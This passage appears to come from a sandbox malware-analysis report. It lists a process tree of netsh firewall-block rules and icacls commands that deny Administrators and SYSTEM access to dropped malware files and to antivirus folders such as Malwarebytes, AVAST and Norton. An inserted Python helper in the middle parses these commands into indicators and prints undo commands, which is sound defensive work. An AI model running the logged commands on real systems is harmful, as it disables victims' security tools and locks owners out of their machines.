          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
            PID:5480
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
          PID:5540
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
            PID:5648
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
          PID:5556
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
            PID:5656
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
          PID:5704
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
            PID:5812
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
          PID:5716
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
            PID:5824
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
          PID:5844
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
            PID:5968
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
          PID:5864
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
            PID:5960
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
          PID:6036
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
            PID:6140
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
          PID:6048
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
            PID:5128
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
          PID:4356
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
            PID:4276
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
          PID:4408
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
            PID:5112
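The netsh entries above (note the rule names HTTP31/HTTP32 being reused for several different addresses) and the icacls deny sequence that follows are a fixed, scripted attempt to cut the host off from security-vendor infrastructure and to lock Administrators and SYSTEM out of the dropped files. The following Python triage helper is an added example, not part of the sandbox report: it parses command lines of exactly this shape, collects the IOCs (blocked remote IPs, firewall rule names, paths with deny ACEs and the principals denied) and emits the corresponding undo commands. The sample command lines are copied from this report's process tree; the undo syntax (`netsh advfirewall firewall delete rule`, `icacls /remove:d`) is standard Windows tooling and is an assumption about how a responder reverts the changes, not behaviour the sandbox recorded.

```python
"""Triage helper: extract IOCs from netsh/icacls command lines and emit undo commands.

Added example, not part of the sandbox report. SAMPLE_CMDLINES are copied from the
report's process tree; the undo commands follow documented netsh/icacls syntax and are
an assumption about remediation, not recorded sandbox behaviour.
"""
import re
from collections import defaultdict

# Constructed sample (copied from the tree): includes a CIDR-style range, a single host,
# the reused rule name HTTP31, and both English and Russian-localised principal names.
SAMPLE_CMDLINES = [
    'netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255',
    'netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113',
    'netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236',
    'netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61',
    'netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61',
    'icacls "C:\\WINDOWS\\inf\\lsmm.exe" /deny Администраторы:(OI)(CI)(F)',
    'icacls "C:\\WINDOWS\\inf\\lsmm.exe" /deny system:(OI)(CI)(F)',
    'icacls C:\\Windows\\java.exe /deny System:(F)',
    'icacls C:\\Windows\\java.exe /deny система:(F)',
    'icacls "C:\\Program Files\\Malwarebytes" /deny Администраторы:(OI)(CI)(F)',
]

# search() rather than match() so the "cmd.exe /c ..." wrapper lines parse as well.
NETSH_RE = re.compile(
    r'netsh\s+advfirewall\s+firewall\s+add\s+rule\s+name="(?P<name>[^"]+)"'
    r'.*?\baction=(?P<action>\w+)'
    r'.*?\bdir=(?P<dir>\w+)'
    r'.*?\bremoteip=(?P<ip>[0-9.\-,]+)',
    re.IGNORECASE,
)
ICACLS_RE = re.compile(
    r'icacls\s+(?:"(?P<qpath>[^"]+)"|(?P<path>\S+))\s+/deny\s+(?P<who>[^:\s]+):(?P<perm>\S+)',
    re.IGNORECASE,
)


def parse_netsh(cmd):
    """Return rule name, action, direction and remote IP spec, or None."""
    m = NETSH_RE.search(cmd)
    if not m:
        return None
    return {"rule": m["name"], "action": m["action"].lower(),
            "dir": m["dir"].lower(), "remoteip": m["ip"]}


def parse_icacls(cmd):
    """Return path, denied principal and permission mask, or None."""
    m = ICACLS_RE.search(cmd)
    if not m:
        return None
    return {"path": m["qpath"] or m["path"], "principal": m["who"], "perm": m["perm"]}


def triage(cmdlines):
    """Collect (blocked_ips, rules_by_name, denied_paths) from raw command lines.

    Sets dedupe the cmd.exe and netsh.exe/icacls.exe copies of the same command.
    """
    blocked = set()
    rules = defaultdict(set)   # rule name -> remoteip specs sharing that name
    denied = defaultdict(set)  # path -> principals with a deny ACE
    for cmd in cmdlines:
        n = parse_netsh(cmd)
        if n and n["action"] == "block":
            blocked.add(n["remoteip"])
            rules[n["rule"]].add(n["remoteip"])
            continue
        i = parse_icacls(cmd)
        if i:
            denied[i["path"]].add(i["principal"])
    return blocked, dict(rules), dict(denied)


def localized_principals(denied):
    """Non-ASCII principal names: evidence the script targets a specific Windows locale."""
    return {p for ps in denied.values() for p in ps if not p.isascii()}


def undo_commands(rules, denied):
    """Undo commands (assumed remediation, not sandbox output).

    netsh delete rule name=X removes every rule carrying that name, so a reused name
    such as HTTP31 needs, and gets, a single delete; icacls /remove:d strips the deny
    ACE for each principal that received one.
    """
    out = [f'netsh advfirewall firewall delete rule name="{name}"' for name in sorted(rules)]
    for path in sorted(denied):
        removes = " ".join(f'/remove:d "{p}"' for p in sorted(denied[path]))
        out.append(f'icacls "{path}" {removes}')
    return out


if __name__ == "__main__":
    blocked, rules, denied = triage(SAMPLE_CMDLINES)
    print("blocked remote IPs:", sorted(blocked))
    print("localised principals:", sorted(localized_principals(denied)))
    print("\n".join(undo_commands(rules, denied)))
```

Two caveats when acting on the output. First, well-known group names are localised, so on an English-locale host the `Администраторы`/`система` variants do not resolve and those icacls calls fail while the `Administrators`/`System` ones succeed (and the reverse on a Russian-locale host); check which deny ACEs are actually present with `icacls <path>` before assuming every recorded command took effect. Second, deleting firewall rules by name is deliberate here: because the sample reuses `HTTP31`/`HTTP32` for many addresses, deleting by `remoteip` would leave siblings behind, whereas one delete per name clears them all.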
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
          PID:4484
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
            PID:4240
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
          PID:4332
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5552
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
          PID:4848
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
            PID:5620
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
          PID:5320
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4784
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
          PID:1520
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5252
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
          PID:5308
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
            Modifies file permissions
            PID:5496
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
          PID:5236
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
            PID:5504
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
          PID:5256
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
            Modifies file permissions
            PID:5436
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
          PID:5460
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
            PID:5680
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
          PID:5976
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:6020
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
          PID:5640
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
            PID:6016
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)
          PID:6080
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5568
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)
          PID:6024
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny System:(F)
            PID:5028
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)
          PID:6028
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\java.exe /deny система:(F)
            Modifies file permissions
            PID:5488
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
          PID:5808
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
            PID:5196
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
          PID:5772
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
            PID:5176
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
          PID:5728
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5396
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
          PID:5900
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
            PID:648
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)
          PID:5604
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny Администраторы:(F)
            PID:1736
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)
          PID:5088
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny System:(F)
            Modifies file permissions
            PID:5040
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)
          PID:6076
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\windows\svchost.exe /deny система:(F)
            Modifies file permissions
            PID:5124
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
          PID:4896
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5444
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
          PID:2504
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5412
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
          PID:4568
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
            PID:5300
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
          PID:5564
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:508
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
          PID:5484
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:4412
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
          PID:5392
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
            PID:5624
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
          PID:5820
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
          PID:5476
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:5756
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
          PID:5872
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
            PID:5736
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
          PID:5616
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
            Modifies file permissions
            PID:2752
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
          PID:5888
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
            PID:4340
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)
          PID:4212
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass.exe /deny System:(F)
            PID:4444
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)
          PID:4844
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\kz.exe /deny Администраторы:(F)
            PID:6116
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)
          PID:5368
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\kz.exe /deny System:(F)
            Modifies file permissions
            PID:5868
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)
          PID:5572
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\script.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5928
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)
          PID:5380
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\script.exe /deny System:(F)
            Modifies file permissions
            PID:5776
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
          PID:6060
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
            PID:5904
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
          PID:5576
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny System:(F)
            PID:6112
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)
          PID:4604
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny Администраторы:(F)
            PID:5596
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
          PID:4532
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny System:(F)
            Modifies file permissions
            PID:5280
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)
          PID:5276
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\olly.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)
          PID:5944
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\olly.exe /deny System:(F)
            PID:5516
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
          PID:5964
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
            PID:4524
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)
          PID:2796
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\lsass2.exe /deny System:(F)
            PID:5828
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)
          PID:2076
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\boy.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:5984
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)
          PID:5560
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\boy.exe /deny System:(F)
            PID:5160
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
          PID:5972
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
            PID:4200
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
          PID:5548
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5200
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
          PID:5148
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
            PID:5500
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
          PID:4736
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
            Modifies file permissions
            PID:5156
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
          PID:5268
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
            PID:5684
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
          PID:5580
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5848
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
          PID:6040
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:2268
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
          PID:4400
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
            PID:5788
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
          PID:4584
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:3912
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
          PID:4932
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5456
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
          PID:4052
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
            PID:5908
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
          PID:5464
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
            PID:5212
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
          PID:1220
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
            PID:5448
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
          PID:5600
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:2784
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
          PID:5408
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
            PID:1716
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:5288
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            PID:2536
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:6084
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5752
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
          PID:1892
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
            PID:5644
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
          PID:2164
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:3672
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
          PID:4384
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
            Modifies file permissions
            PID:5228
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
          PID:5632
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
            PID:5764
